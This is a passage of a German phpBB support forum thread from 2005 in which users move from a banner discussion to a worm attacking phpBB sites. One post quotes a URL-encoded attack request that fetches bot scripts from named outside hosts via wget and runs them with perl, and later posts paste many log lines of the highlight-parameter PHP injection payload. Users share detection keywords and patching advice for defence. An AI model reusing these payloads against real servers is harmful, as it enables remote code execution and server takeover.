Seite 7 von 11
Verfasst: Do 06.Jan, 2005 14:59
von skittles
Na freut mich dass ich euch Modern auch mal nen kleinen Gefallen machen kann!
Auch wenn es in keiner Relation zu eurer Arbeit steht!
Auf alle freuts mich dass es zumindest mal auf oxpus.de verwendet wird!
Falls wer von euch die PSD Datei braucht PM reicht!
Bei Änderungsvorschlägen detto!
Verfasst: Do 06.Jan, 2005 15:16
von AmigaLink
Bei Änderungsvorschlägen detto!
Eine Standartgröße von 88x31 wäre interessant.
Verfasst: Do 06.Jan, 2005 18:06
von oxpus
Ja, stimmt. Ist nicht Banner-gerecht...
Verfasst: Do 06.Jan, 2005 19:55
von skittles
Ich finde leider keine gscheide Pixel font!
daher schauts net 100% super aus!
Verfasst: Do 06.Jan, 2005 21:06
von AmigaLink
Sieht doch gut aus.
*demnächst auch auf meinen Seiten zu sehen ist*
Verfasst: Do 06.Jan, 2005 23:39
von oxpus
Eingefügt, hochgeladen, Post geschrieben, aktualisiert und Schwups: Da ist es
Verfasst: Fr 07.Jan, 2005 02:55
von skittles
So schnell kann es gehen wenn man ein wenig html kann! ;ö)
Da funkt dann sogar noch die Verlinkung! grr
Verfasst: Fr 07.Jan, 2005 11:22
von oxpus
Jo. Genau.
Hatte ich beim ersten glatt vergessen.
Verfasst: So 09.Jan, 2005 13:39
von easygo
Achtung! Wurm attackiert auch die portal.php
Hier der Beweis:
Code: Alles auswählen
/* /forum/portal.php?month=-1&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bo */
Verfasst: So 09.Jan, 2005 13:58
von Blisk
Just a question, should this install all who have phpbb forum and how can I see that my forum is attacked by this worm?
Verfasst: So 09.Jan, 2005 14:08
von oxpus
@easygo
Danke für den Hinweis, habe die portal.php hier gleich mit angepasst.
@Blisk
Look into the log files from the webserver. If you forum there links to the viewtopic.php with "chr(", "wget", "echo" or "rush" in it, the worm will attacks you.
To avoid hacks and heavy traffic
- install the CBack CrackerTracker
- update your forum to 2.0.11
- update (or let this your hoster do) PHP to 4.3.10 (or newer).
These are very important updates to protect your board!
EDIT
@cback
Schau mal hier nach:
http://www.restaurantkaiserwilhelm.de/k ... /index.php
Verfasst: Di 11.Jan, 2005 09:34
von skittles
Sollte man das eigentlich nicht in jeder php Seite machen?
Also portal, calender, kb, und so weiter???
Verfasst: Di 11.Jan, 2005 09:37
von oxpus
Solange die nicht angegriffen werden, weniger. Halt die Log-Files im Auge behalten.
Verfasst: Di 11.Jan, 2005 09:44
von skittles
na gut die sind bei mir eh noch jungfräulich! ;-)
Verfasst: Di 11.Jan, 2005 09:50
von Blisk
now I can see this work, trying to attack.
Verfasst: Di 11.Jan, 2005 11:18
von blondi
Hallo Cback...mal was nettes von mir...
Lieben Gruss
Verfasst: Mo 24.Jan, 2005 16:15
von only4pro
Danke für dieses AddON, habe ich mal schnell verbaut.
mfg
p.s: Cback du hast ja auch einen vServer bei server4you. Wie hast du mod_rewrite mit confixx zum laufen gebracht? Falls du noch weißt wie bitte da rein posten. Meine gefundene Lösung funktioniert noch nicht
http://www.oxpus.de/viewtopic.php?p=21528#21528
Verfasst: Mo 24.Jan, 2005 16:16
von cback
p.s: Cback du hast ja auch einen vServer bei server4you. Wie hast du mod_rewrite mit confixx zum laufen gebracht? Falls du noch weißt wie bitte da rein posten. Meine gefundene Lösung funktioniert noch nicht
Gar nüscht, die von OXPUS gepostete .htaccess Lösung bringt auch mein Confixx zum abschmieren
(bzw. verhindert das man auf die Seite kommt). Bei mir ist nur mein CrackerTracker im Einsatz aber der hat bisher alles abgefangen
Verfasst: Mo 24.Jan, 2005 21:37
von blondi
habt ihr schon bemerkt das der wurm wieder voll gas gibt...
hatte die letzten tage, wenn überhaupt nur einen angriff...
aber heute geht der ab ohne ende...
24.01.2005, 21:10 168.210.90.180 Mozilla/4.0 t=16&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 21:01 24.147.177.171 Mozilla/4.0 p=165&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 20:32 24.147.177.171 Mozilla/4.0 t=88&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 20:27 202.173.144.102 Mozilla/4.0 p=85&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 20:17 24.199.221.80 Mozilla/4.0 p=203&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 20:13 202.173.144.102 Mozilla/4.0 t=16&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 20:10 24.199.221.80 Mozilla/4.0 t=11&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 19:40 24.199.221.80 Mozilla/4.0 p=93&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 19:27 24.199.221.80 Mozilla/4.0 t=68&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 19:22 203.26.206.129 Mozilla/4.0 p=122&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 19:07 202.173.144.102 Mozilla/4.0 t=88&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 18:12 199.247.156.8 Mozilla/4.0 p=10&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
24.01.2005, 18:01 199.247.156.8 Mozilla/4.0 t=68&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%
Verfasst: Mo 24.Jan, 2005 23:32
von AmigaLink
habt ihr schon bemerkt das der wurm wieder voll gas gibt...
Nö - durch den .htaccess eintrag ist der CTracker arbeitslos geworden und langweilt sich.
Verfasst: Mo 24.Jan, 2005 23:59
von blondi
.htaccess --- HMMMM.... ISS ?
Verfasst: Di 25.Jan, 2005 10:05
von oxpus
Verzeichnis Zugriffschutz durch den Webserver.
Google mal danach, und Du wirst mit Erklärungen überschüttet
Verfasst: Di 25.Jan, 2005 10:32
von Max
aber trotz .htaccess, welche sehr gut schützt, wird das Forum durch die Angriffe langsamer in den Momenten der Angriffe. Ich habe das gestern erlebt, da war mit einem mal die generierungszeit von ca. 2 Sekunden auf ca. 8 Sekunden angestiegen.
Gruß Max
Verfasst: Di 25.Jan, 2005 13:59
von blondi
Ja kann ich auch bestätigen, hatte gestern extrem viele Angriffe... habe den Cback Code auch noch in paar andere Files wie portal usw.... rein....
grüsse
Verfasst: Di 25.Jan, 2005 14:29
von blondi
wie kann ich denn erkennen welche seite der attackiert....
Code: Alles auswählen
25.01.2005, 04:44 202.173.144.102 Mozilla/4.0 t=75&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 03:53 210.55.230.21 Mozilla/4.0 t=16&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 02:55 24.147.177.171 Mozilla/4.0 p=250&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 02:42 202.173.144.102 Mozilla/4.0 t=11&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 02:40 24.147.177.171 Mozilla/4.0 t=49&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 02:35 24.147.177.171 Mozilla/4.0 t=123&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 01:52 24.147.177.171 Mozilla/4.0 t=109&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 01:47 24.147.177.171 Mozilla/4.0 t=11&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 01:45 24.147.177.171 Mozilla/4.0 p=10&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 01:21 24.147.177.171 Mozilla/4.0 t=85&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 01:06 24.147.177.171 Mozilla/4.0 p=250&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 00:09 24.147.177.171 Mozilla/4.0 t=109&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
25.01.2005, 00:08 24.147.177.171 Mozilla/4.0 t=77&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527